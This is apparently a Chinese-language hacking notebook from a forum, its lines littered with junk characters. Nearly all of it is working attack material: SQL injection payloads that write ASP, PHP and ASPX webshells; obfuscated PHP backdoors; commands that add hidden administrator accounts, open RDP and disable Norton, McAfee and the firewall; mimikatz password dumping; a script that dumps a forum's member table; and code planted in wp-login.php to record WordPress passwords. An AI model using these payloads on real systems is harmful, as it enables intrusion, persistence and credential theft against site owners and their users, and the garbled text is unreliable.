3 s) S3 [( g& F7 b2 ]SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a! I! Z! r4 Y4 i) e4 ] W
access中导出shell G/ M7 G9 z8 y% N" e
& e& n6 \& T4 _) @/ M0 B: n中文版本操作系统中针对mysql添加用户完整代码:
- Z p% l8 N5 A
+ M; S) t( L9 n, [: q8 huse test; t8 R) J/ M- D0 H
create table a (cmd text);
; y; Y( c6 \& I% ^+ u- S6 @insert into a values ("set wshshell=createobject (""wscript.shell"") " );# u+ s* @- n" m. T" Y
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );- o* W, z' B, S* ^! b1 }; j
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );. P) y' Q& j! e, n+ f
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
! h5 Q. Y" r- @7 Idrop table a;
) J* J' @* K9 u# P3 e$ F$ D# N" w, w! x! U! ~3 d: [7 K" J z
英文版本:
+ j( ?8 L7 a) u# D$ G% F( Q9 v8 i- K: M# Z0 |$ C$ P6 f1 x( R5 a* ~
use test;; Q0 W% _% s7 z' J3 \! ^
create table a (cmd text);
. @4 \, P8 Q' l5 |. D: }$ Tinsert into a values ("set wshshell=createobject (""wscript.shell"") " );7 c' D" G+ o J. ]
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
9 n# m/ H# G6 j* V. Linsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " ); ^' {5 @. [. L! k3 A p2 L
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";) t, d5 P' g+ ]% D8 W
drop table a;. \1 r2 B( D3 V1 [. M- E: l s
* M! q+ r, d( U2 O9 h6 C9 }& }create table a (cmd BLOB);
- f% E [5 b' A& jinsert into a values (CONVERT(木马的16进制代码,CHAR));
7 L( y, Q, k/ m" b/ b( Xselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'0 z: r- H. ]( r' y* A
drop table a;8 g/ [6 Y2 g3 w( {
- w+ e/ X0 t4 E2 Y7 n
记录一下怎么处理变态诺顿
) [: u( ~# H+ v% E3 }查看诺顿服务的路径
+ h2 {7 B ] q/ u5 ^( {- ksc qc ccSetMgr- v ?" T! F) M/ H) T; s
然后设置权限拒绝访问。做绝一点。。
7 G" J% {- ~% H/ u! lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system0 _4 d; A: ?; k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER": f# @$ |5 Y) J: X
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
: W# c# {8 j `" e# I; W2 ?cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone- [7 Q" m( W s% F
8 F& v" l$ T5 l) T# e7 ~
然后再重启服务器4 }- V0 s) o3 s6 i. F6 Z/ R
iisreset /reboot
, y9 W5 y3 U- x) R6 b1 v c这样就搞定了。。不过完事后。记得恢复权限。。。。
' Q% l, c8 [* c3 bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F3 t' q" a( B: P* v' v+ K |
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F* g0 c& W0 K+ Q$ n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
& o4 `+ n1 {, e- C& d( h8 X$ s" Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F) O5 F( ^, R: D7 O0 u- t. c
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin \5 ]: T, m3 Y* Y8 x
- F1 H+ X1 G0 N# oEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
4 T5 S! t4 m. K! W8 f; h! i- j/ i8 s" q; a
postgresql注射的一些东西
, W- @* `" Y7 \/ p- M如何获得webshell
* ?/ G" Y7 F6 Z$ C) X, q6 f( P* ihttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
; M) D- v( G7 S" Rhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); : t1 W3 ?$ }0 @+ u/ ]
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
; N! C$ J% s0 _' @) _6 \1 F如何读文件
8 b7 H, H' M: [$ i1 rhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);* U m8 z' K. H
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;3 u5 M) r+ }3 P% ?& z1 ?5 Q; N
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
6 s5 @8 L6 u2 `: i5 K: |" ?
/ V3 Z8 _! P3 Z0 ^' F5 dz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。4 b$ r/ r* g- I% X1 h
当然,这些的postgresql的数据库版本必须大于8.X: S! V6 p/ c6 J+ X) E3 J: p
创建一个system的函数:
, K" n$ }6 \3 ~$ M' t, jCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
7 ?+ g: h- z- E2 M5 c7 d( K$ a% u6 j0 b) B2 b5 D# C+ V
创建一个输出表:0 p& N; Q2 _# V6 ]$ l% ^
CREATE TABLE stdout(id serial, system_out text)
: ?9 U8 _7 ]. U, m( O3 A2 J- C
$ u8 P) r- C" t5 T" ]# l) \, T执行shell,输出到输出表内: C1 J1 }& R" h" n
SELECT system('uname -a > /tmp/test')
$ ~, J- a% X, o( F: L1 ~; W# A+ N6 y& G7 f
copy 输出的内容到表里面;7 O) J) @- r% u2 @! Y' u$ s
COPY stdout(system_out) FROM '/tmp/test'$ K2 z2 c/ }5 t6 I% c
! W7 s. [6 x' Q0 L8 z. O
从输出表内读取执行后的回显,判断是否执行成功1 E. W& g, k% v: H& D$ j* Z f
- c4 m* F% f1 l9 ISELECT system_out FROM stdout
2 h. {! t u+ R# l9 w下面是测试例子 m/ i0 i3 Y" q! k' T, }& l0 b5 g
9 ~8 A" t* ?4 q) q5 h
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 9 T2 a1 ^9 }4 ]& O) I
5 ?7 M" v" P- t/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
# ]* w" z$ @; l' k3 {) f- sSTRICT --* j9 F7 h# b/ U4 q) a
# h: G4 S1 ]/ Z/ a" j
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
9 f9 M, S, Y. K3 M
6 ]. \+ N8 v+ K/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
8 ^$ v H/ L* G/ m& N* `, T1 `
! p, i0 C% X; @$ F4 M/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
$ o; ?. c9 s' P/ s4 [net stop sharedaccess stop the default firewall- D; A# B+ q5 H; d( s
netsh firewall show show/config default firewall
; `- D T' @/ N- A" m) \: X6 qnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
7 F1 v0 }1 C4 p7 Mnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall1 F; z! I( j2 z% t8 K
修改3389端口方法(修改后不易被扫出)
" C. N3 N) I6 W ^( _& j l修改服务器端的端口设置,注册表有2个地方需要修改0 B: w& z; g' Q) O4 ^3 B
& x% ~# E- ]* _ u$ O8 ?[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
) Z* h. U- c; k7 [' `3 K$ {( e1 x9 vPortNumber值,默认是3389,修改成所希望的端口,比如6000
7 k' j7 T F% |
4 N% u+ [- t" e- z# U第二个地方:
, J% f1 F4 B {0 ~$ o[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ) n$ J* k7 s3 l" [# a
PortNumber值,默认是3389,修改成所希望的端口,比如60003 J2 |7 o3 z4 H3 f' r
. V" Y/ S0 ?" ~1 ?. x1 ~" S) k现在这样就可以了。重启系统就可以了
& g8 ~& C5 M! L7 l$ l" p1 s
$ W8 v! s& R1 z; W8 K查看3389远程登录的脚本. A( @8 X9 W1 _8 Q" D$ g
保存为一个bat文件5 }1 D- L9 j( W
date /t >>D:\sec\TSlog\ts.log) A2 l" i: |; W/ L5 t% _" I
time /t >>D:\sec\TSlog\ts.log
. r1 A% m$ |7 `0 ^% p: M2 wnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log( Z9 ^2 @0 g( G" V u$ }8 \* r
start Explorer
- g& |6 |8 Y6 J" n0 |9 q5 z
/ h0 y6 c4 h3 dmstsc的参数:
# `7 p4 A, p/ L9 [
: t+ _$ p9 E$ L* v. f远程桌面连接1 G1 E) N; R. Z) [9 I) o3 H& ~
- |% S' m6 w# ~3 xMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]$ s2 ?, C2 [) B* h1 G+ `) D K
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
. V) [1 p. U; e/ y2 J8 Y1 T' H4 H" j3 ^7 d2 u1 V
<Connection File> -- 指定连接的 .rdp 文件的名称。, D `% R4 d1 d% r: O
4 i; O( n( t6 I
/v:<server[:port]> -- 指定要连接到的终端服务器。
, Q0 X: Y5 h+ w5 V) j% m O$ u: u
* W1 J% \: M& Y! _8 y% ?/console -- 连接到服务器的控制台会话。
- {( r- W0 s# d1 ?! M8 |; c, M' r, V+ O- H9 A
/f -- 以全屏模式启动客户端。4 O' c8 v& ?5 W" U
$ I: r, _& b: E1 n) j; c/ R1 t2 M1 S/w:<width> -- 指定远程桌面屏幕的宽度。) d9 D, D8 g& f" S. m! F8 H
" R, y! x; ~3 c# A9 w/h:<height> -- 指定远程桌面屏幕的高度。
0 {2 [/ Q+ [2 t9 m" ?+ M$ f
2 A" W: I3 w6 w3 z. ?( u- m6 A9 g/edit -- 打开指定的 .rdp 文件来编辑。
9 r, [- Q- G0 r3 ]8 v3 j* v
# j0 j. i8 E9 U2 |4 y/ w* T/migrate -- 将客户端连接管理器创建的旧版
! [5 ]5 {; q9 U. H7 L& j, u7 {4 B" p连接文件迁移到新的 .rdp 连接文件。
! v) M5 e( @3 X1 v% T
! {- @ g, T8 {& U* Z, E, A, \5 o
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
+ h+ r# l4 [2 c6 `mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
' O+ E7 A: [4 f) n4 P& W$ E, W6 V9 `' t
命令行下开启3389
( ^$ ?& X( M6 i+ Q! nnet user asp.net aspnet /add
# B, g$ v7 |% ?0 inet localgroup Administrators asp.net /add: x7 s/ L& ]# g+ N U, L, P
net localgroup "Remote Desktop Users" asp.net /add1 A% o' ?- q# N2 P
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
2 m$ v2 o( G7 z8 D8 @echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0/ C& u( b0 v' D" z9 G# p! J) z; y
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 18 v M" R1 {' L2 F7 k! U- F" O
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f; Y) f" O& v% T* o
sc config rasman start= auto+ p! f, t; P. u1 Z) s
sc config remoteaccess start= auto9 U+ P: _) g( x- z
net start rasman2 c! Z3 V. F; ?2 U
net start remoteaccess
8 o: @2 ^. y" C9 CMedia- Z/ `: E& L8 Z3 n
<form id="frmUpload" enctype="multipart/form-data": E; ]& ]. R n3 ]% g! A. {' q; F
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>8 f. ^' h( }# w6 ?5 n5 l
<input type="file" name="NewFile" size="50"><br>; _6 e E1 Y7 ^+ K' `
<input id="btnUpload" type="submit" value="Upload">2 K$ C3 X' l- W! h* K$ B9 l+ }+ @9 A% b
</form>
* T" H: J0 `( v0 t/ g2 i* `4 E6 K) U! x- A' b/ j* G
control userpasswords2 查看用户的密码
7 D( \8 J4 E" d# b* I3 Uaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
* s6 a7 w( S( t0 x) I# l- H6 ?SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
+ u) L2 |2 b8 K- h" m; V" ^! _* z& v6 [2 l
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:3 O/ ]0 B7 e1 O9 C7 |4 W. d5 D' u
测试1:9 n& \& K7 X( H k' _( A
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t15 R# v) s; D4 M5 Z
4 ]9 G" t d7 I测试2:
1 D7 e# v2 c7 l, [2 p+ h% ]
. a2 [2 |3 m% `9 f \5 {create table dirs(paths varchar(100),paths1 varchar(100), id int)6 Z! l" k+ T; @ k2 }# }# u
' }. K' t" @1 t' B! O/ d- Xdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
) v6 k/ a4 a; i% k
! d: p( l s J6 P: T" h0 RSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
; v+ k2 y8 w6 I! K7 y8 X: k2 N( K关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令/ R' |% M( a A1 O
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
3 ~! E9 W7 ^& |3 h/ Enet stop mcafeeframework
9 }" J& t% [% s/ r1 i( G$ f, Gnet stop mcshield9 e7 T) K, g+ k+ M
net stop mcafeeengineservice# ^ n% u+ z' ^ m
net stop mctaskmanager
# o% w( Y o: a" ~. Uhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D. G: }9 M# [# K9 i: P- ?! i
6 [$ B' O+ E/ t4 s* K& w' @! O VNCDump.zip (4.76 KB, 下载次数: 1)
( U2 `4 Y- R3 k5 d' I ?密码在线破解http://tools88.com/safe/vnc.php
/ a3 }5 X: K! e% L& VVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取3 W! V8 T* E: P3 `
: j8 `+ i! f8 m, R/ gexec master..xp_cmdshell 'net user'
. D# R j! b- z0 D' wmssql执行命令。6 w4 W( R6 _. @& R5 V
获取mssql的密码hash查询# t4 j1 P2 ]7 ^) Z9 L6 t
select name,password from master.dbo.sysxlogins0 u, v, b. R3 \, [6 c, C6 ~
" O# Z3 e/ f) l: ^8 ]9 Fbackup log dbName with NO_LOG; }( S1 F! h k0 ?) r0 J
backup log dbName with TRUNCATE_ONLY;# `( h @( W4 l4 e# L9 I
DBCC SHRINKDATABASE(dbName);: x8 q- V; ]( D/ f
mssql数据库压缩2 H; F( @% V( o& C# n* K
5 t; ]6 R, w. G( Z, dRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK! p. p/ S8 O+ i! @
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。" D; B+ S1 ^& W7 R+ v/ C
2 b1 v* v ?' I. g" O% c" Dbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
7 C( f; u; w. C0 L8 X/ b备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
; y* _, H. `7 |7 R
$ |+ Y& R4 O3 ~$ f' W9 vDiscuz!nt35渗透要点:
; d. S7 h U7 ?(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default# j& U# U% N# X1 x
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>, V3 _, e+ j. s. P& r
(3)保存。
4 q3 B# p* s8 D(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass$ g4 a7 t+ C8 Q [# p, F
d:\rar.exe a -r d:\1.rar d:\website\) p6 H/ D# [8 s" c
递归压缩website( S2 i! e2 W5 \4 {: a
注意rar.exe的路径
- u; @0 Y( e# U6 z4 ?" Y# q* J5 Z
<?php
4 p: w3 X* O9 n7 k, X e/ V; O' @
5 I0 X9 ^9 ]2 Q/ Z. N$telok = "0${@eval($_POST[xxoo])}";+ K R* {3 i# h! n9 A7 Z# a
& T- G) u4 A5 I/ |3 [ M! w
$username = "123456";
$ j9 |; ?- o: ?
7 x7 C; J6 s7 A( N |' J$userpwd = "123456";0 z) h2 ~. A" E6 A' P3 [5 z+ Q# r
) O2 y u/ s) C7 ^" Z( g1 e1 d
$telhao = "123456";
( P6 |4 t8 T, Z: }$ C0 W. E" J; g, @! t8 }$ d2 w7 p
$telinfo = "123456";, y0 J6 ~- ~- h" `
3 x) d* E# G+ y4 R+ v* ]8 R
?>: v0 L2 T0 m" ?9 M4 h
php一句话未过滤插入一句话木马$ W4 C: M" s o2 ~2 X" J9 h0 S' X. y1 X
& L& y) U, \& z) s0 k
站库分离脱裤技巧* E0 d! ~( d4 c) @* t
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
: h9 X% Y' N$ i0 l/ E* x2 O: J$ \exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
7 h) m, z$ a, E+ I9 H条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。/ r8 R: | D) j7 e" y3 h
这儿利用的是马儿的专家模式(自己写代码)。
4 m( r8 Z" c T) _1 @1 h! Mini_set('display_errors', 1);$ ~ w, K' z# [' J' b
set_time_limit(0);! c1 E: r. b: I0 U7 u
error_reporting(E_ALL);) k4 H6 a( g1 j2 n: Y" @
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
. E9 u6 U& s% R6 Y: mmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());1 F! _* ~2 O8 b7 }
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
& r3 Q) v, \4 ?$i = 0;
( p+ h! T. D1 K, Q! V$tmp = '';
# e- Z/ K( y5 K9 c7 N9 K: }; wwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
3 f& N& Y9 N4 \- w3 s' M3 {9 o8 D $i = $i+1;$ k4 | K8 o9 _% c9 L
$tmp .= implode("::", $row)."\n";! d" r) o( J8 c) o! l1 {3 P9 ~
if(!($i%500)){//500条写入一个文件, G/ N& C7 L% s% C0 b
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
) R8 ~9 m4 g& h file_put_contents($filename,$tmp);
$ r3 }8 O9 B7 S( x. C $tmp = '';" `5 g0 [1 i/ U* z
}0 Z: `' p1 Z+ c8 S
}# f) t8 d4 ^. b- ?% b1 C" O
mysql_free_result($result);4 ?; J L L7 E
% p5 p! ?6 s0 E/ b \" S _
: E4 X$ ?/ h- `$ S# S( l
" I. A( _3 u- w' @( ]' T: v//down完后delete& [) g5 b9 e* B
6 G$ N. r/ O9 C
3 _( w/ @3 C$ T& I% A- Kini_set('display_errors', 1);& }' a6 n( T$ A9 \+ s, a2 c; L
error_reporting(E_ALL);
& ], n* v/ f. _: e. e" z' Q. a/ H# `2 R$i = 0;0 p6 m6 K8 R- h; z6 j
while($i<32) {6 j8 C* }+ C9 j- ~% X' V+ c
$i = $i+1;
/ b0 z7 H9 A1 Z" B; z5 t $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt'; U" d6 \0 S1 ?+ _# O. K; w6 E/ w
unlink($filename);
1 l* F+ F$ C" v: E. B" S+ Y}
0 E2 R4 \ T9 a! i: M1 J; s# khttprint 收集操作系统指纹
# l' z3 s- |0 Y3 @( ~9 A9 p" u% w0 H, Y扫描192.168.1.100的所有端口# U5 c: {) W0 V \ Q/ V" y9 a
nmap –PN –sT –sV –p0-65535 192.168.1.100) O' @; N; Q* k" M# s* g' C3 U4 e% {' K
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
* S" i; F+ q* X" r1 Ihost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输 V$ q7 `! ]6 f i: l
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host# O( Y. K' k6 {& A7 o& Z; s# p! x
9 k+ J1 [( X' S5 h* p Q0 @% w7 ZDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)" C7 Q+ h2 B% ~7 g
6 q; [+ S* C" ?- R) F& Z% x MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
" d; v- b' Q2 Z, e' g4 E9 t+ c! e7 h9 W5 j9 Z/ f: b& ~
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
( d! v. s" X* e) `0 P5 o
S; i1 q. J/ }$ b4 T DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)* Q+ o, M$ r9 I
; E# M+ L6 r4 M' f http://net-square.com/msnpawn/index.shtml (要求安装)3 Y" n9 w: l, s6 o! W% j
& W: S3 g0 M4 Z9 ~7 m tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
5 w0 n* L/ b) n5 Z+ G1 t( w$ t% d/ G4 d' a& o4 I) q+ \; k. m3 ^
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
3 R; F, e+ V" G! A* ^$ y5 D. ^7 wset names gb2312
6 I) [0 P3 p$ `# [4 x0 V导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。; c) v' o; L. @ q2 `% t: F
9 \6 P8 s! q5 O
mysql 密码修改
& {8 ? H0 u* b3 zUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” ! \2 M! ]7 d) X1 `+ b2 S
update user set password=PASSWORD('antian365.com') where user='root';
; T2 Y7 ]6 k3 d' A4 Wflush privileges;# ~5 A$ R+ d! J; k* h" l+ q
高级的PHP一句话木马后门
, w! Z/ \: O ^3 B9 f
" ~0 K* r; q, F* y! t入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
7 {* Q3 o) d* |, g; [3 M; L7 d' c4 a$ b! Q
1、# A: t; _4 y/ O) M- I* u# U' e
# w6 n6 c5 e c- _4 I) k, D5 @' z( d
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";1 h9 l2 l, \: A
9 ^, Q( ~+ X" F: x+ }
$hh("/[discuz]/e",$_POST['h'],"Access");" x5 ?4 r5 g6 i$ z) ~8 m
3 b. h3 Q; b U* V/ N2 J//菜刀一句话" n8 ?& H2 n( C! B/ K
0 f" q) @; v. `2、
8 Y3 ]$ Q- T$ K, n) i+ u( F6 g5 W4 {$ ~' i! x
$filename=$_GET['xbid'];, j& H/ V7 I. Y1 z! S
& e; K& n$ Q. K
include ($filename);
" Q+ y& S- u( a& }7 m1 L4 k) }# g! [3 _0 |3 @: ~+ U0 L% v
//危险的include函数,直接编译任何文件为php格式运行: b( t/ \0 S% O$ F) |4 J
5 c+ F* s4 M: H$ Y8 |; S+ D$ q* V" t3、# t. g: Q+ w( {" |: l# l
- r# R# z4 s3 M: L! O: a
$reg="c"."o"."p"."y";
8 r5 \% [7 d2 Y" N: s+ _7 `4 G) W7 Y6 O& o' Q U( d
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);4 j) D I. r* s. j) p, Q, c
" x4 f% S! G7 d9 q' y8 A
//重命名任何文件, L4 L# G' M" g! y8 _+ P
8 b( q0 y& m/ u" v' N4、8 ~8 {5 y3 g+ J3 x8 ]' v" M/ u/ m: z
8 X# M$ Y; l* Q3 \' s c* G# s$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";; e( a4 d% l( _! j2 P+ l
; N" q( n: a- y4 N, ~. f9 {% w
$gzid("/[discuz]/e",$_POST['h'],"Access");" x) \# l" F( g7 p% |
( E% ~) |0 Q# U0 U1 j! c
//菜刀一句话
% T: n) [' D$ v. M4 g, @7 a ^ j& g1 ]% \" v' J
5、include ($uid);+ I% Y( [6 K( M5 [1 Z7 r
+ e' j* n: m3 v: C) u7 }8 m//危险的include函数,直接编译任何文件为php格式运行,POST
5 b5 r( M, z8 h% p% b) _, j; w! ~& G7 v0 W% x6 E
! ^& B2 A' z) u) W. Q//gif插一句话! U6 o# T( }4 ?1 {
% O7 f1 Q# ]( n; Z6 e* I( f6、典型一句话: S! ]; n( @6 F: w. V2 O& b3 i _
" ?' p. X) K, h2 I
程序后门代码; N" P1 O7 K9 O, y
<?php eval_r($_POST[sb])?>/ |* ?/ y7 [$ e. B2 s3 r" u
程序代码# Z! C. W0 H- Z B1 h# \* T
<?php @eval_r($_POST[sb])?>4 V/ Z: P4 y1 k9 o4 A' o
//容错代码3 {' |& x3 ]. d5 c# h$ I f- n- s7 ~; |' q
程序代码
* A4 ^7 \ l# s" m8 k1 Q<?php assert($_POST[sb]);?>! I3 G' y9 A8 ~5 M
//使用lanker一句话客户端的专家模式执行相关的php语句9 J# t( w& P, z# h0 C+ M
程序代码9 G) |5 N0 Y5 \$ l. \1 f% k
<?$_POST['sa']($_POST['sb']);?>4 C, x: L p r. n3 ]8 E" T
程序代码, N/ M8 g! L9 E q/ I& z; D3 W. F
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>) P M* w! d! u3 F4 r |3 T+ ~
程序代码- V; G2 o; \ k6 l7 \, a
<?php
9 W: t* [! l3 Q@preg_replace("/[email]/e",$_POST['h'],"error");
2 { d% v4 R" f7 n4 h& D?>
3 X9 w8 Q x9 ]0 \( ~9 m0 E5 W//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入6 \0 K8 y4 D; q0 X$ M
程序代码
0 X" i8 e! S& ~$ w' w% h* T# Q<O>h=@eval_r($_POST[c]);</O>
" Y9 |8 P( m( h. s: C/ K) J) H程序代码$ |7 X, {: z$ j, {6 A: C) ~4 T
<script language="php">@eval_r($_POST[sb])</script>/ M0 ]; F) c- Z1 O5 H, s1 J
//绕过<?限制的一句话4 I7 h$ t z0 G4 P+ I O2 u
# x7 S: h9 h3 i- x3 N3 c2 l9 l3 [
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip0 @) W# q, |) H) m& c' d! s
详细用法:( S# ^8 f$ q, h Q2 O# L; c
1、到tools目录。psexec \\127.0.0.1 cmd! d- j3 u! H0 Q% m
2、执行mimikatz
' S3 t" O! G0 T4 H# A* O3、执行 privilege::debug
' Z; l$ I' |3 a' q4、执行 inject::process lsass.exe sekurlsa.dll
& |) f% q Z$ ?) t! e5 x4 x5、执行@getLogonPasswords3 y2 W7 c( e# O3 C: V: L
6、widget就是密码
$ F( K8 f5 l5 c& D, e. \, L7、exit退出,不要直接关闭否则系统会崩溃。
. M+ S: x4 M& |& t# o
1 R/ M4 j1 b. t9 x0 d" Mhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
: b; `2 O, Q, x' s4 s3 ^. c( b% ~% [
自动查找系统高危补丁 f2 x3 J/ \( ^6 @
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt: K6 [% k3 k! Z* h; n+ g O
* v/ d9 B3 W! s K" w4 U2 j突破安全狗的一句话aspx后门0 ^' a2 g: G. c7 X9 Y( D0 u
<%@ Page Language="C#" ValidateRequest="false" %>
0 b |! X: e) R9 z<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
a4 S# k4 V$ O2 `webshell下记录WordPress登陆密码
4 U- z3 p; w! p& C" E' Lwebshell下记录Wordpress登陆密码方便进一步社工7 S5 C. f: S4 z! y) V I- T
在文件wp-login.php中539行处添加:
$ o. P6 }* w8 [& o8 g// log password0 A5 |' [, [( e
$log_user=$_POST['log'];
) r3 j# t4 M2 Q& I+ @$log_pwd=$_POST['pwd'];8 l( |( o, \* a& e+ S3 ?
$log_ip=$_SERVER["REMOTE_ADDR"];
. p: y2 e5 M( K: M- y9 ?$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;+ X5 U$ t& ^4 D$ O! S! n) a
$txt=$txt.”\r\n”;
) p I3 o. J0 |$ I8 i- e) m L6 Kif($log_user&&$log_pwd&&$log_ip){
) S4 ^ S _+ q- z M" i@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
